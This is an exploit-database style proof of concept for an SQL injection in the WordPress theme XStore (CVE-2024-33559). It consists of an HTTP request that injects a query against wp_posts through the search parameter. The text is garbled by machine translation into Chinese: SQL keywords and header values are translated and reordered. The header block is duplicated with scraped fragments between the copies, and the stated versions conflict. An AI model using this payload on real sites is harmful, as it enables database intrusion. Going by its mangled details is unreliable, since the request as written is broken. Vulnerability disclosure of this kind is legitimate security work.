#利用标题: WordPress主题Xstore 9.3.8 -SQLI
#Google Dork: N/A
#日期: 2024-05-16
#漏洞作者: [abdualhadi khalifa(3https://Twitter.com/absholi_ly)
#版本: 5.3.5
#测试在: Windows 10
#CVE: CVE-2024-33559
POC
post /?s=%27%3b+从+wp_posts%3b+ - http /1.1选择+*+
HOST: example.com
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)
AppleWebkit/537.36(Khtml,像壁虎一样)Chrome/107.0.0.0 Safari/537.36
Accept: Text/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.9
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
Connection:保持空白
升级- 不肯定- requests: 1
#Google Dork: N/A
#日期: 2024-05-16
#漏洞作者: [abdualhadi khalifa(3https://Twitter.com/absholi_ly)
#版本: 5.3.5
#测试在: Windows 10
#CVE: CVE-2024-33559
POC
正在加载...
github.com
HOST: example.com
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)
AppleWebkit/537.36(Khtml,像壁虎一样)Chrome/107.0.0.0 Safari/537.36
Accept: Text/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.9
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
Connection:保持空白
升级- 不肯定- requests: 1